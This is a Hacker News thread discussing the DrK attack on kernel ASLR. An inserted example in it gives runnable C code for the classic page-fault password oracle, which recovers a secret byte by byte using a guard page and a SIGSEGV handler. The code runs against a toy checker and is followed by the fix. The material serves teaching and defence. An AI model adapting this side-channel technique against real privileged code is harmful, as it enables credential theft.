The DrK Attack: De-randomizing Kernel ASLR

159 points by tsgates, over 8 years ago

8 comments

JoshTriplett, over 8 years ago
Providing user control over page faults and using that for a security exploit reminds me of the classic UNIX tale of password checking. A version of UNIX had a privileged mechanism that would check a password (provided by pointer); it did so character-by-character. It also had a way for userspace processes to handle page faults themselves. So, put a password buffer across two pages, with the page boundary after the first character, and change the first character until you get a page fault. Repeat for each character of the password...
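The page-fault oracle described in the comment above, written out as an added example; this is not JoshTriplett's code, nor anything from the DrK paper. It is a single Linux/POSIX process that plays both sides: a deliberately byte-by-byte checker against a constructed secret ("hunter2"), and an attacker that lays each guess across a page boundary so that the byte under test is the last readable byte before a PROT_NONE guard page. If the checker reads past the boundary, the kernel delivers SIGSEGV, which the attacker catches with sigsetjmp/siglongjmp: a fault means every byte up to and including the one under test matched, no fault means the checker stopped early. The candidate alphabet (lowercase plus digits) and the secret are assumptions of the demo.

```c
#define _GNU_SOURCE
#include <setjmp.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* Constructed secret for the demo; stands in for the privileged side's copy. */
static const char SECRET[] = "hunter2";

/* Deliberately vulnerable checker: compares byte by byte and returns on the
 * first mismatch, so how far it reads into `guess` reveals how long the
 * matching prefix is. */
static int check_password(const char *guess)
{
    for (size_t i = 0;; i++) {
        if (guess[i] != SECRET[i]) return 0;
        if (SECRET[i] == '\0') return 1;
    }
}

static sigjmp_buf fault_env;

static void on_segv(int sig)
{
    (void)sig;
    siglongjmp(fault_env, 1); /* abandon the faulting check, restore the signal mask */
}

/* Runs the checker on `guess`. Returns 1 if the checker faulted (touched the
 * guard page), else 0 with the checker's verdict stored in *verdict. */
static int fault_oracle(const char *guess, int *verdict)
{
    if (sigsetjmp(fault_env, 1) != 0) return 1;
    *verdict = check_password(guess);
    return 0;
}

/* Recovers SECRET into `out` (capacity `cap`) one byte per page boundary.
 * Returns the recovered length, or -1 if setup fails or a byte of the secret
 * lies outside the candidate alphabet. */
int recover_password(char *out, size_t cap)
{
    /* Assumption of the demo: the secret uses only lowercase letters and digits. */
    static const char alphabet[] = "abcdefghijklmnopqrstuvwxyz0123456789";
    long page = sysconf(_SC_PAGESIZE);
    if (page <= 0 || cap == 0 || cap > (size_t)page) return -1;

    unsigned char *region = mmap(NULL, 2 * (size_t)page, PROT_READ | PROT_WRITE,
                                 MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (region == MAP_FAILED) return -1;
    /* The second page becomes a guard page: any read past the boundary faults. */
    if (mprotect(region + page, (size_t)page, PROT_NONE) != 0) {
        munmap(region, 2 * (size_t)page);
        return -1;
    }

    struct sigaction sa, old;
    memset(&sa, 0, sizeof sa);
    sa.sa_handler = on_segv;
    sigemptyset(&sa.sa_mask);
    sigaction(SIGSEGV, &sa, &old);

    size_t len = 0;
    int done = 0, stuck = 0;
    while (!done && !stuck && len + 1 < cap) {
        /* Lay the guess out so byte `len` is the last byte before the guard page. */
        char *guess = (char *)(region + page - (len + 1));
        memcpy(guess, out, len);            /* known prefix so far */
        int verdict = 0, found = 0;
        for (const char *c = alphabet; *c && !found; c++) {
            guess[len] = *c;
            if (fault_oracle(guess, &verdict)) {
                /* Fault: every byte up to and including guess[len] matched. */
                out[len++] = *c;
                found = 1;
            }
        }
        if (!found) {
            /* Nothing faulted, so the secret may end here: try the terminator. */
            guess[len] = '\0';
            if (!fault_oracle(guess, &verdict) && verdict == 1) done = 1;
            else stuck = 1;
        }
    }
    out[len] = '\0';

    sigaction(SIGSEGV, &old, NULL);
    munmap(region, 2 * (size_t)page);
    return done ? (int)len : -1;
}

int main(void)
{
    char buf[64];
    int n = recover_password(buf, sizeof buf);
    if (n < 0) { puts("recovery failed"); return 1; }
    printf("recovered %d bytes: \"%s\" (checker says %d)\n", n, buf, check_password(buf));
    return 0;
}
```

The cost is linear in the secret's length times the alphabet size instead of exponential, which is the whole point of the story. The fix on the checker side is the same as for any comparison oracle: compare the full buffer in constant time and length-independent order (or compare hashes), and never let a privileged routine's memory-access pattern on attacker-controlled memory depend on secret data. Note that in the historical attack the checker ran in a privileged context and only the fault was observable; here both halves live in one process purely so the mechanism can be run and inspected.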
ryuuchin, over 8 years ago
So yet another KASLR bypass.

Reminds me of [1]:

> Consider this our "I told you so" that we hope you'll remember in the coming years as KASLR is "broken" time and again. Then again, in this offensive-driven industry, that's where the money is, isn't it?

[1] https://forums.grsecurity.net/viewtopic.php?f=7&t=3367&sid=ee9f8c1bacede4863bcab77b96eff623
josteink, over 8 years ago
To me it seems like every time Intel tries to create a security safeguard, it almost always, without exception, ends up being a new attack vector instead (see "x86 considered harmful").

I'd love to run simpler versions of the modern Intel CPUs stripped of all this insecure bloat.

Surely I can't be the only one?
Cyph0n, over 8 years ago
I attended a talk on DrK by Yeongjin a few weeks back at Georgia Tech. Keep up the awesome work guys, and welcome to the front page of HN ;)
willvarfar, over 8 years ago
(This popped up on proggit the other day, but got deleted for some reason: https://www.reddit.com/r/programming/comments/58fpi6/aslr_protection_on_intel_haswell_takes_only_60ms/ )
dooglius, over 8 years ago
For a system as complex and intricate as a modern processor, it seems impossible to prevent a userspace application from figuring out at least some basic information about the kernel's state. It would be better to focus on avoiding actual privilege escalations.
shamsalmon, over 8 years ago
I would have loved for this kind of research to be my job. Should have done better in my classes :(
cheiVia0, over 8 years ago
Scary :(